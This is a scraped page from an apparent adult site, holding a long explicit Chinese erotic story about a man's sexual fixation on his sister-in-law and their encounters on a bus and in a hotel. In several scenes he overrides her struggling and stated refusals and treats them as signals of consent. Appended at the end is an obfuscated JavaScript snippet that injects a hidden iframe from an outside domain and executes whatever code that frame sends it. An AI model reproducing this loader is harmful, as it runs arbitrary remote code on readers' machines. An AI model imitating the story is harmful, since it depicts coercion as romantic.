字幕網- 每日更新 永久免費

我和大嫂的第一次見麵是在我表哥的婚禮上。
  我家這邊對於迎娶新娘有一個習俗:找個新郎認識的未成家的Xiao男孩,如果是新郎的弟弟那就更好了,在迎親的前一天晚上,童男子和新郎一起睡,叫做「壓床」,至於原因就不知道了。第二天迎親的時候,當新娘從喜車上下來時,由童男子牽著新娘的手下車(當然新娘要給錢的),在新娘進門要洗臉,洗完臉的水也是由童男子倒掉(這同樣要新娘給錢的)。我哥結婚時我就是那個童男子。
  當時的我才初一,標標準準的一個童男子,黃片(那時我家那邊還沒有A片,想看的話就隻有黃片),黃色小說等等聽都沒聽過,手淫自慰什幺弄都沒弄過。當時對女性,僅僅是知道和我有不同,但哪裏不同並不知道。所以我和我嫂子的第一次見麵什幺事都沒有,也不可能有什幺。事實上,之後的很多年裏也沒有什幺事發生。嫂子也僅僅是嫂子。
  我哥是個司機,在縣城裏沒有房子,租了一個小房子。這個房子原本是個庭院,聽說是原來的主人兩口子鬧翻臉了,最終把房子一分兩半,中間用一堵牆隔起來。我哥就住在其中。每年過年他們一家三口回老家過年,春聯什幺的都是我家幫他們貼上去。所以這才有了以下的故事的發生。
  那年三十,我哥一家早就回去了,我媽讓我去貼春聯。當時我已經高中畢業了,才上大學,隻有個名叫五指姑娘的女朋友(你們都懂得)。當時我貼好春聯後,隻是隨意的進去看了看,真的隻是隨意的。或許驚喜往往就是這樣突然砸在你的頭上,反正當時我就覺得我被幸運女神給上了——我看見了嫂子一家的衣服晾在衣架上。再仔細一看,準確的說,我還動手翻了翻衣服,看見了我想要看的東西——嫂子的胸罩和內褲。真的,當時真的很激動,雖然嫂子長得算不上漂亮,但有著164cm的身高,再留著劉海,離遠點看真的不錯。胸部也不小,有C,臀部到不是很大。以前自慰的時候有意淫過嫂子,隻是或許意淫的功力還不夠,單純的意淫嫂子實在是沒有動力,可現在我看見了嫂子的內衣,那還說什幺。當時我長了個心眼,看了下嫂子的內衣是如何掛在衣架的,還拍了張照片,唯恐拿下來後無法還原。做好準備後,小心翼翼的將胸罩從衣架上拿了下來,放在鼻子下深深的吸了口氣,並沒有想象中小說中所說的女人的體香味,有的隻是洗衣液的味道,有點不舒服的拿起內褲,放在鼻子下聞了下,還是洗衣液的味道。唉,該死的洗衣液。算了,洗衣液就洗衣液吧,至少還有的褻玩。迅速地把褲子連同內褲都脫了,頓時打了個冷顫,年三十的天還是冷啊。不過心頭是熱乎乎的。
  嫂子晾衣服的地方有個帶鏡子的衣櫃,看著鏡子裏的我——上身還穿著自己的衣服,陰莖上裹著嫂子的內褲,手裏拿著嫂子的胸罩。不自覺的就開始擼了起來,閉著眼睛,想象著嫂子就站在我的邊上,看著我那她的胸罩和內褲手淫;想象著嫂子站在邊上,一絲不掛的站在我身旁;想象著嫂子在我耳邊低吟,小聲的說著我的雞巴真大;想象著嫂子蹲在我的身下,張著嘴靠近我的雞巴,細心的舔弄著我的大JB;想象著嫂子搖曳著身子,晃動著她的乳房;想象著嫂子站在笑板凳上,用她的陰唇摩擦著我的雞巴;······一邊意淫著嫂子就站在我旁邊,一邊快速的擼著我的JB,感覺要到了,感覺要不行了,快不行了,「嫂子,我不行了,我不行了,憋不住了······」,「嫂子,嫂子·····」,「嫂子,嫂子,快看,射給你了····」一個冷顫,射出了大量的乳白色液體,由於有內褲裹著JB,所以精液都射到了嫂子的內褲上。過了一會兒,我才感覺自己的魂回到了我的身體裏。看了看鏡子裏的自己,手上的胸罩已經掉在了地上,大紅色的內褲上有著一灘乳白色的精液。再次閉上了眼,想象著嫂子正站在我的身邊,看到了我射精的全過程,看到了她的內褲上有著我的精液;想象著嫂子和我麵對麵站著,看著我仍拿著她的這條大紅內褲,伸出了舌頭,從一側的嘴角慢慢的劃過上嘴唇,劃過另一側的嘴角,又劃過了下嘴唇,最終回到了一開始的那一側嘴角······過了一會,我睜開了眼,眼前沒有想象的那個女人,那個我應該叫嫂子,但我很想喊一聲湘兒的女人。默默的將套在JB上的內褲拿了下來,反手用內褲擦了擦陰莖,拿起自己的衣服,快速的穿起來,這天實在是冷。
  穿好衣服,看了看沾著精液的內褲,想了想幫自己的想象中的老婆洗內衣完全沒壓力,便拿著胸罩和內褲走進了洗手間,拿出了塑料盆,放了水和洗衣液,就把內衣放進去,先泡著再說。
  離開了洗手間,走到了廁所,想了想,終究還是沒能抵得過內心的邪惡,打開了坐便器旁的紙箱,晦氣,什幺都沒有,本來還想看能不能有什幺驚喜呢。轉念一想,今天的驚喜已經夠多了,再多就過了,凡事過猶不及,做人要厚道啊。
  自我安慰了會,就回到了主臥室,看了下,除了床就是電視,沒什幺。突然想起來了,剛才忙著自慰,隻顧著晾著內衣的衣架,衣櫃還沒看過呢。想到這,立馬走向剛才的房間。拉開櫃門一看,嫂子的衣服不多,或者說收拾的比較好,看不到。如果想找肯定能找到,隻不過這樣的代價太大,算了。關了櫃門,想了想還是把胸罩洗了吧,泡了一會可以了。明早是新年的第一天,我決定再射一炮,作為新年的第一彈。恩,趕緊洗完衣服,甩幹了晾在裏屋吹,這樣明早應該可以幹的。
  終於到了新的一年了。趕緊放了開門鞭,打開門進去,反手將門鎖好,這樣就不怕有人打擾我和嫂子的「二人世界」了。摸了摸昨天洗的胸罩和內褲,幾乎感覺不到濕了,nice啊。站在昨天的鏡子前,想了想,昨天隻是在這小房間,隔壁可是主臥室,嫂子可在那上麵睡過,笨死了。想到這,立馬飛奔到主臥室,打開燈(冬天6點多,天還比較黑),關上臥室的門,這樣等會就溫暖了。迅速的脫了身上的衣服,拿著嫂子的衣服,鑽進了被子。哇,真冷,剛進入被子就打了個冷顫。開了電熱毯,過了會才覺得暖和。時間到了。
  穿上嫂子的大紅內褲,帶上嫂子的胸罩,雖然有點變態的感覺,但對我來說這是一種享受,一種無與倫比的享受。我整個人爬了起來,將胸罩拿了下來,對折著放在床上,將內褲折疊的放在胸罩裏麵,將勃起的JB插在胸罩,趴在床上聳動著我的腰,像是在操逼一樣操著我的嫂子的胸罩和內褲,好像嫂子正躺在我的身下,朦朧的雙眼看著我,緊咬著嘴唇,承受著我的攻擊;慢慢的,在聳動的過程中,我感覺我真得看到了嫂子,她穿著那一套大紅色的內衣,套著一層透明的薄紗,打開了關著的房門,看著我聳動的屁股,很妖豔的笑了;慢慢的,將披在身上的薄紗褪去,隻剩下那鮮豔的大紅色的胸罩和內褲;緩慢的抬起手,翻到後背,動了幾下,雙手又回到了前麵,兩手各自捏著胸罩的帶子,一點一點的拉了下來,那雙玉手一鬆,那胸罩就掉在了嫂子的腳下,兩團乳肉露了出來;兩手環抱著乳房,挑逗的瞥了我一眼;彎下腰,輕輕褪去了那礙事的內褲,頓時黑色的三角森林映入眼簾。我隻覺得JB頓時又大了。嫂子邁著性感的步伐走到了床邊,很自然的躺下來,什幺話也不說,隻是看著我;我慢慢的靠了上去,挺起了雞巴,直搗黃龍。「嗯···嗯····」,「嫂子,嫂子,好熱,好濕····」「嫂子,嫂子,我不行了,不行了····」「嫂子,嫂子,湘,我來了,我全射給你····」一陣冷顫,又是一團液體流出我的身體。····感覺好像過了好久,我慢慢的回過了神,哪有我的湘兒,我的嫂子,什幺都沒有,有的隻是嫂子曾經穿過的胸罩和內褲在我的胯下,受著我的進攻,那一團液體就是「戰鬥」的成果。翻身躺在床上,赤身裸體的躺在床上,不知道哪邊才是嫂子睡的地方,不管了,就這樣吧。想象著嫂子在我的胯下得到快樂,我就感覺激動。
  同樣的地方,同樣的方法,一早上,想象著在我胯下承歡的嫂子,我射了多次,知道雞巴一勃起就痛才停了下來。再次把內衣洗了晾幹,像原先那樣掛在衣架上,鎖上了門,就仿佛鎖上了我曾經對嫂子最接近的性接觸的記憶。
  ***********************************????????或許是我在夢中弓雖女幹了幸運女神無數次才換來了一個機會——我哥開車在外,趕不回來陪嫂子去南京看病,這早就預約好了,醫生可不會因為病人個人的原因錯過了約定的時間還給你補回來,所以陪嫂子去看病的擔子就交到了我的手上。
  上了南京班的車,人不多,50座的大巴隻坐了10來個人,於是我就推著嫂子坐在了後麵。車是直接上的高速,並沒有在高速下麵走,或許是規定吧。嫂子坐在車上很快就睡著了,估計晚上沒有睡好吧,畢竟要去醫院看病,晚上的睡眠質量估計夠嗆。我看著嫂子倚著睡覺,今天嫂子梳的是我最喜歡的劉海,近距離的看著嫂子,心裏好平靜,想象中的情欲並沒有冒上心頭。一切是那幺的美好。不知道過了多久,車在休息區停了下來,我喚醒了嫂子,讓她下車休整一下。在嫂子起身的時候我好想看到了什幺掉了下來,定睛一看,我勒個去,是衛生巾,我瞥了嫂子一眼,發現嫂子臉唰的就紅了,急忙撿起衛生巾就下車了。等到回到車上時,臉還是紅紅的。頓時,我覺得我受不了了,雞巴頓時就向嫂子敬禮了,還好現在是夏天,我穿的是大褲衩,勃起的雞巴不是很明顯。很快車就啟動了。由於剛才的衛生巾掉落事件,我和嫂子之間有了一點尷尬,我發現嫂子坐在位置上不舒坦,屁股幅度很小的挪動。嗬嗬,看來嫂子雖然年紀不小,但麵對這種尷尬的事情還是很不習慣啊。
  我坐在嫂子旁邊,假裝屁股下麵不舒服,往嫂子那邊挪了挪,嫂子抬頭看了我一眼,沒說什幺,又飛快的低下了頭。這是什幺意思?告訴我下麵可以繼續?
  不管了,先試試再說。「嫂子,剛才那個衛生巾····」「剛才什幺都沒發生,你····你什幺都沒看到。」我的話還沒有說完,嫂子就打斷我的話,隻不過說話的聲音不大,頭還是低著。感覺有戲。「嫂子,剛才是我不好。」看到嫂子抬頭看著我,我剩下的話都淹了下去,趕緊換個話題。「嫂子,你說,今天如果檢查結束的早,要不我們就上街逛一逛,畢竟南京吃的玩的都多,隻是看看不買的話,新街口都能去。」「新街口?」「就是一商業中心,簡單點說,就是吃喝玩樂都有。」「哦,那看情況吧,結束的早就去看看吧,不過在那吃飯的話應該很貴吧。」「恩,那我們就看看,到住的賓館附近再吃飯吧。」一邊說,一邊靠近嫂子,終於與嫂子靠在一起了。嫂子看了我一眼,沒說什幺。沒說什幺就是說了什幺,我心領神會,伸出手抓住了嫂子的手,放在手心溫柔的撫摸。嫂子在家做的事情很多,所以雙手摸起來並不像年輕女性的手那樣光滑,而是有點粗糙,還有一些老繭。細心的摸著嫂子的手,我抬頭看著嫂子那仍紅暈的臉蛋,情不自禁的親吻了嫂子側臉。嫂子白了我一眼,在我看來這更是一種誘惑,也是一種信號。當即將嫂子的手按在我的襠部,按在我那早已敬禮不止的雞巴上。我感覺到嫂子的手有些掙紮,但到了這個地步,哪還容得嫂子的反抗,而且嫂子的掙紮力度實在讓我不敢恭維,估計是一種矜持吧。感受著嫂子雙手的撫摸,我覺得真心的舒服,生理上的,心理上的,都有。我的手摸到了嫂子的乳房,雖然隔了胸罩和外衣,依舊可以感覺到那種柔軟。不滿足的雙手,早已脫離了我大腦的控製,不自覺的想要更近一步。就在這時,嫂子的雙手脫離我的襠部,按住了我的雙手,擋住了我的進一步的探索。「不要這樣,這是在車上,不要這樣,好嗎?」「嫂子,我聽你的,可是你看,我的弟弟不聽我的使喚····」頓時,嫂子的臉更加的紅潤,「不要這樣,要不,要不····嫂子用手····那啥····」「真的嗎?嫂子····」好像聽到嫂子答應了一聲,不過聲音小的連坐在她邊上的我都聽不到。不過,聽沒聽到沒關係,重要的是事實。看著嫂子的手慢慢的挪向褲腰,我禁不住伸手握住嫂子的那雙手,迅速的伸向褲腰,拉開褲腰,直接伸了進去,抓住了我那膨脹的雞巴。真的,第一感覺就是溫暖,好溫暖的手。大家都知道,平時的陽具的溫度是略低於人體的溫度的,雖然勃起充血的時候溫度會有所上升,但人手心的溫度不低,再加上緊張的通病——手心冒汗,溫度自然不會低。我看著嫂子的臉,「嫂子,動一動好嗎?我好想感受你的手擼動我的雞巴,可以嗎?」心知這時候嫂子決然不會拒絕,要拒絕也早該拒絕,而不是到現在這種箭在弦上的時候拒絕。嫂子不敢看著我的眼,低下了頭,雙手倒是聽話的動了起來,雖然不快,但是和我自己擼完全是兩種感覺。我探過頭去,吻著嫂子的臉蛋,吻著吻著,就吻上了嘴唇,一會含著嫂子的嘴唇,一會伸出舌頭來回舔著嫂子的嘴唇,隻不過嫂子始終不肯張開牙齒,無法深入,實在是遺憾。「嫂子,你的手好溫暖,真的····」靠著嫂子的耳邊,我輕輕的說道。說完,將嫂子的耳垂含入口中,靠著嫂子的我感覺到了嫂子身體的僵直,看來這是嫂子的一個G點。我伸出手,揉了會豐滿的乳房,向嫂子的褲子移動,慢慢的,慢慢的,讓嫂子可以感受到我手的動作。突然,嫂子抬頭靠近我的耳邊,「這裏不行,不要,好嗎?」聽著嫂子在我耳邊的輕語,感受著嫂子吐出的氣息,雞巴頓時又膨脹了些,我都感覺雞巴都已經膨脹到最大了。靠近嫂子的耳邊,吐了口氣,「嫂子,我這是情不自禁,手不受大腦控製。不過既然嫂子你都說了,大腦怎幺也得控製住手對吧,不過····嫂子,手得不到滿足,我心裏好難受,嫂子,我該怎幺辦?」「你這個偷你哥牆角的小畜生,現在都這樣了,你還想怎樣?」「嫂子,這可不怪我,這都是你那衛生巾若得禍,不過我的確得感謝那片衛生巾,嫂子,告訴我,那衛生巾還在身上嗎?」「·····」「那看來是用起來了,嫂子,手不要停。嫂子,等會看完醫生我們先去賓館休整一些吧,我要那片衛生巾,不準藏起來或者直接扔掉,我要它。」「不行,唔····」我不等嫂子說完,就吻住嫂子的嘴,「嫂子,不要說話,一切到時候再說,我現在隻想享受嫂子你的溫柔,享受嫂子你的手帶給我的快樂。嫂子,你知道嗎,這一刻,我等了好久好久,從來都隻在夢中才出現,沒想到竟然有一天會在現實中發生,我真的真的好開心。嫂子,我愛你,嫂子,我愛你,快點,再快點,我要把我的精華都交給你····」明顯的,嫂子在我JB上的手擼的變快了,我不再說話,隻是將頭靠在嫂子的脖頸處,聞著嫂子身上的味道,很淡,是沐浴露的味道。一陣冷顫過後,我的精華都忍不住從體內衝了出來,灑在嫂子的手上和我的內褲上。嫂子拿出了她的手,我看著嫂子手上的乳白色精液,看著那幾秒前還在我體內的液體,現在卻安靜的躺在嫂子的手上,我已經不知道說什幺了。嫂子拿出了麵紙,擦幹淨了手,雖然擦幹淨了手,但手上的精液味道可沒法消掉。看到嫂子白了我一眼,有了一種衝動,我抓起嫂子的手,放到了我的嘴裏,看著嫂子的眼,吮吸著嫂子的手,頓時精液味撲鼻而來,但沒關係,我依舊陶醉在吮吸嫂子的手。不過沒過多久,嫂子就不讓我吮吸了,「我累了,我想休息了,你····你不要再亂搞了,知道嗎?」「嫂子,我知道了,你累了就休息吧,到南京的話我叫你起來。」說完,不容嫂子拒絕,手環抱著嫂子的肩膀,將嫂子的頭放在我的肩上,「嫂子,你快睡吧,睡個好覺。乖。」剩下的路程在我靜靜的看著沉睡的嫂子中走完了。
  等看完醫生,做完檢查,報告要等到第二天才能出來。我和嫂子就離開了醫院,坐公交到了我在網上團購的賓館。吃完午飯,我和嫂子逛了會街,不過搜子不喜歡逛街,再加上天也很熱,火爐名不虛傳啊。我們就回到了賓館。嫂子說要上洗手間,就直接走進去。過了會出來了。我立即走進洗手間,打開紙箱,沒有衛生巾,看來嫂子還在用,還好。撒了泡尿,解了生理問題。出來看見嫂子在看電視,想起在車上的經曆,雞巴不由自主的跳了跳,有點勃起的感覺。坐到嫂子的身邊,直挺挺的看著嫂子。嫂子被我看的有點尷尬,剛張開嘴想要說些什幺,我就直接吻了上去,緊緊的吻著嫂子的嘴唇,舌頭不時伸出來舔著嫂子的嘴唇和牙齒,慢慢的,感覺嫂子好像放鬆了點,雙手立即覆上嫂子的乳房,搓揉著,變換著形狀。很快,嫂子的牙齒不再緊緊咬著,我知道,機會來了。舌頭更加用力的頂著嫂子的牙齒,很快就進入到嫂子的口腔中,追逐著嫂子的舌頭,吮吸著嫂子嘴裏的口水,覺得最好喝的飲料也不過如此。知道嫂子感覺喘不過氣,推開我,我們緊緊貼在一起的嘴唇才分開,分開的嘴唇間還有著我們的口水,慢慢拉長,在陽光的照耀下油然升起一種淫蕩的氛圍。分開的我們兩深深的吸了幾口氣,看著彼此,距離再變短,分開的嘴唇再次靠在一起,這次,不再是我主動,嫂子主動伸出了她的舌頭,伸進我的嘴裏,我的舌頭立馬纏了上去,與嫂子的舌頭追逐著彼此的口水。過了好一會兒,分開的我們彼此看著對方的眼睛。「你知道的,我是你的嫂子,雖然現在說這個已經晚了,但是我還是要說,我們現在還沒做出最後一步,我不想再錯下去了,我知道你現在很難受,我可以像在車上那樣幫你解決,好嗎?」「嫂子,我們已經錯了,就算現在收手也於事無補····」「不,不是這樣的,不要逼我好嗎,我已經錯了,我不想再錯下去了····你不是說要我的···我的···衛生巾嗎,我給你,我可以用手幫你,不要做出最後一步,好嗎?嫂子的內心無法原諒自己····」「嫂子,我們已經錯了,就算現在收手你難道就能原諒自己嗎?」「可是,我至少可以對自己說我沒有喪失最後的底線,不要逼嫂子好嗎?你不是說你愛嫂子嗎,難道這就是你愛我的方式嗎?讓我更加的痛苦?」「····嫂子,我····我可以答應你,我們不會做出超出你現在的底線的事,如果這樣····」「我什幺都可以答應,我····我也知道錯了,在車上就不應該做出那種事的,鬼使神差的幫你手淫,唉····」「你用過我的內衣自慰,我沒說錯吧?」「沒,我哪有機會,如果嫂子你給我機會,我絕對不會錯過。」「還狡辯,你以為我不知道,那年過完年我回到家收拾衣服的就發現我的胸罩和內褲上有很小的白色斑點,當時沒想到為什幺,今天在車上幫你射了以後我才想明白。這下不狡辯了吧?」「額,的確,但我記得我明明洗幹淨了呀,怎幺還會有遺留呢?」「嗬,你以為你能洗幹淨嗎?」「好了,反正嫂子你也知道了,那我們繼續剛才的事。」「你答應過我的···」「我知道,我會遵守的。嫂子,我可以叫你湘兒嗎?」「隻能在今天,以後都不可以。」「湘兒,我喜歡你。」「嗯····」我再次吻上了我的湘兒的嘴,再次伸出了舌頭追逐著湘兒的舌頭,再次吮吸著我的湘兒的津液···看著湘慢慢褪下了身上的衣物,我也迅速的脫掉了我的衣服。看到湘脫下的內褲上還沾著的衛生巾,我控製不住的射出手把內褲拿到我眼前,看著衛生巾中間那濕痕,還有中間的那點點血絲,抬頭看著嫂子。「這幾天我的好朋友來了,不過快要走了。」把衛生巾放到鼻子下麵,深深的吸了口,頓時一股騷味撲鼻而來,情不自禁的伸出了舌頭舔了舔衛生巾上的血絲和濕痕,放下內褲,看著嫂子。「我答應過你,不會做出超出你底線的事,但我想,我隻要不真正將我的雞巴插進你的屄,這樣不會超出你的底線吧,湘?」嫂子勉強的點了點頭,明顯我剛才的動作已經預示我接下來要做的事情了。我把嫂子推到在床上,分開了她的雙腿,頓時映入眼簾的就是黑色陰毛,茂密的屌毛,我靠了上去,手在陰毛上劃過,又將臉靠上陰毛,感受著陰毛摩擦著我的臉的那種粗糙感,向下看到嫂子的陰唇,嫂子估計性生活過的不是很頻繁,陰唇外翻的不多,雖然說不上是粉嫩的木耳,但並不黑。我的嘴貼上了嫂子的陰唇,伸出舌頭來回舔著大陰唇,「嗯····嗯····慢點·····輕點····」聽到嫂子的呻吟,我覺得我收到了嫂子發給我的信號。頓時再次埋首在嫂子的陰唇上,深深的舔弄著,舌頭不時嚐試伸進陰道。覺得光靠嘴已經不能滿足我的欲望了,我用手搬開了嫂子的陰唇,頓時尿道口和陰道露了出來。向尿道口吹了一口氣,頓時嫂子的身體抖了幾下,嫂子的呻吟更加的讓我受不了。伸出一個手指頭,輕輕探入陰道,頓時感覺手指頭被溫暖所包圍,還能感到濕潤,果然女人都是水做的。「不要····不要····」「不要再深入了,求你了,我們不是說好的嗎?」無奈,我隻能拿出我的手指頭,將嫂子翻了個身,扒開了嫂子肉感十足的屁股,菊花般的屁眼就充斥我的眼睛。相對於皮膚的顏色,屁眼有點黑,還散落著少數的毛,伸出手撫摸著菊花,鼻子靠近菊花深深的聞了一口,還有點尿騷味,估計是剛才尿尿的原因,伸出舌頭舔了舔。受不了了,再這樣下去我估計無法遵守我說過的話了。將嫂子拉了起來,將雞巴伸到嫂子的嘴邊,示意嫂子用嘴服侍我的陽具。嫂子看了看我,感覺到了我的決心,張開了嘴想一口吞下去,不過嫂子錯估了她的嘴和我的雞巴,沒能成功,牙齒還磕到了我的雞巴,一種痛感湧上心頭。「慢慢來,還可以用舌頭。」我對嫂子說。嫂子白了我一眼,伸出了舌頭,舔弄起我的雞巴,或許這是嫂子的第一次吧,感覺好生疏,牙齒不時還會磕到雞巴。算了,不為難嫂子了。我讓嫂子拿起她的內褲,套在我的雞巴上,一邊擼著我的雞巴,一邊伸出舌頭舔露出的龜頭,不一會感覺要射精了,雞巴明顯又大了一圈,嫂子也知道我要射了,「嫂子,我要你用嘴接住,快,我要射了····嫂子,嫂子····我要射了····嫂子,嫂子,嘴···嘴····嫂子,來了····我來了···嫂子····」噗噗的聲音下,是我的馬眼張開了,白色的液體飛奔而出,射到了嫂子的嘴裏,還有些灑到了嫂子的臉上,頭發上···過了一會,射玩了的我腿一軟坐在了床上,看著嫂子的臉,「嫂子,我····吃下去,好嗎?」目不轉睛地看著嫂子,懇求著嫂子。嫂子深深得看著我,喉嚨動了動,精液就順著喉嚨下去了,看著嫂子真的吃下了我的精液,我覺得好開心。不管嫂子嘴裏還有我的精液味,臉上還有未幹的精液,親吻上了嫂子的嘴,舌頭再次回到了它最喜歡的地方,追逐著嫂子的舌頭,吮吸著津液····過了好一會,我和嫂子分了開來,我抱著嫂子走進浴室,互相清洗著身體。在浴室裏,我又忍不住勃起了,最終還是嫂子用手幫我解決了,當然少不了吃掉我的精液。····在回家前的這段時間,隻要在賓館裏,我和嫂子一直都是赤身裸體,性起就互相解決,當然我也不會隻顧自己的享受,我也心甘情願的用我的嘴幫嫂子泄了身。
  一個下午,加上一個晚上,我和嫂子不知道互相弄了多少次,我隻知道到第二天起來時雞巴勃起的時候會痛,所以我盡量不去想亂七八糟的事,省得雞巴痛的難受。
  自從那次和嫂子一起去看病以後,再也沒能和嫂子一親芳澤,我也無法說服自己用這件事要挾嫂子,讓她和我再虛凰假鳳一般。算了,這就當做是回憶吧,既然嫂子不想破壞她的生活,我也不想嫂子她為難。我愛她,我不想她受到折磨。
  算了,一切就當是回憶吧,一切都當做是我的意淫吧。看著嫂子在家操持著家務,一切都結束了。
  
【完】

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:【慈禧的英國情人,是gay】【完】
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};